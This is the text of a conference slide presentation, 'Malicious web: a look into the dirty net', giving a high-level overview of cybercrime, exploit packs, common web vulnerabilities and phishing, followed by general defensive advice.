malicious web: a look into the dirty net · sqli, rce, bof... sql injection: inefficient checks on...
TRANSCRIPT
Davide “ocean” Quarta
Malicious web:a look into the dirty net
Something about me...
I'm a student, i'm mostly interested inmalware/rootkit research, reverse engineeringand psychology of security. Also got some interest inalgorithms and web application security.I program since i was 14 (x86/z80 asm programming and C).
Presented other papers in Italian IT events.
Proud member of EvilFingers group, i write for the team's bloghttp://evilfingers.blogspot.com/
My blog: http://www.inseclab.netsons.org
What are we doing here?
IT Security!!!Home Users
GovernmentsBusinesses
IT Security
A few questions:● Why must we defend ourselves?● From who/what?
Replies from the public? :)
Home UsersGovernments
Businesses?
What if we were the bad guys?
●Crimeware based organizations
●Scareware companies
●Skilled singles/teams
●Ex-employees
●Other companies
●Adverse governments
What's the gain?
Web Threats
Web Threats
Malware
Cybercrime Crimeware
Exploit Packs
SQL InjectionXSS
RCE
RFI
0Day
Buffer OverflowNull pointer dereference
ScarewareIdentity TheftFraud
Malware/Scareware/Crimeware
●Malware: software created to be installed and carryon activities without the users informed consent
●Scareware: scam software, forces the user to be scared ofsomething and pay for a fake service.
●Crimeware: malware created with the intent of automatingcybercrime. Used for identity theft to get access tosensible data like banking accounts.
SQLi, RCE, BOF...
●SQL Injection: inefficient checks on SQL queriesto database can lead to remote execution of code.
●RCE: Remote Code Execution
●Buffer Overflow: lenght of input buffers not checkedhigh risk of DOS or RCE/LPE
XSS, RFI
●XSS: Cross Site Scripting, unverified input can lead tocode execution, used to insert external frames in a pageor steal session informations.
●RFI: Remote File Inclusion
0Day
Exploiting application withunknown/unpactched
software vulnerabilities
Exploit Packs
●Web Based Malware Kits●Mostly coded in PHP●Serves web pages carrying exploits to inoculate malware●Produced by single/team●Price $100-$3000
●Some informations on evilfingers blog (thanks to Jorge Mieres)● http://evilfingers.blogspot.com/2009/08/prices-of-russian-crimeware-part-2.html● http://evilfingers.blogspot.com/2009/06/trade-russian-version-of-private.html● http://evilfingers.blogspot.com/2009/03/russian-prices-of-crimware.html
Exploit Packs
●Vulnerabilities most used:● PDF exploits● ActiveX exploits● Browser plugins/components exploit
●Used by crimeware organizations to deploylarge scale malware infections
●Large scale malware infection results mosteffective in the first weeks of activity
Latest Exploit Packs
●Produce Statistics about usage/infections
●Selection of which countries to infect
Social Engineering
Tricks Deception
People Manipulation
Divulging sensible/confidential data Performing actions
Fraud
Scam
Phishing
FraudCarding
Identity Theft
Phishing
Criminally gaining access to sensitive informations,trying to look as a thrustworthy entityin an electronic transaction.
Usernames/Passwords, Bank accounts details,Credit Card details...
Scam/Carding/Identity Theft
●Scam: fraud perpetrated with the use ofSocial Engineering techniques. Also called “confidence trick”
●Carding: theft/fraud using credit cards
●Identity theft: stealing identities to steal money orgain other benefits
RBN
Is an organization wich offers bullet-proof hosting to a lotof cybercrime activities.
● Delivery of exploits● Identity Theft● CP● Malware● Phishing● Cybercrime● Spam
Under the hood: skilled enough?
If you have enough skills/resources you can alsosell other services in the black market:
● Custom Rootkits● Custom malware● Custom PE Packers/Crypters● Mw with custom AV/VM defeat techniques● Mw with scan for known vulns● Selling 0Day vulnerabilities
Fight back!
One important thing is the profile of the attacker,analyzing it we can gain some important informationsabout him and the techniques he use.
Doing proactive security means also to inform people.Security starts from people (employees,home users, professionals...)
Audit/Pentest your networks and products
Try to keep your systems updated and a little moresecure with some good network security products.
Fight back!
Is there any good product to usefor our network security?
...It's out of the scope of this presentation to say this :)
Security researchers are doing a good job, but i think that the best results can be achieved with community driven efforts.
Conclusions
Questions?
???
Thanks to...
This presentation is dedicated to the people without who Iwouldn't be the nice person I am, my parents and family,two really good friends of mine, Jesus :)
Thanks to my friends in real life and webspace, including andnot limited to: Evilcry, Emdel, C0sm4ky, Nex, Omni, Alby, Raistlin,Pincopall, Zairon, everyone at EvilFingers and Malware Domains List.
Thanks also to my friends irl.
Thanks also to you for being here today!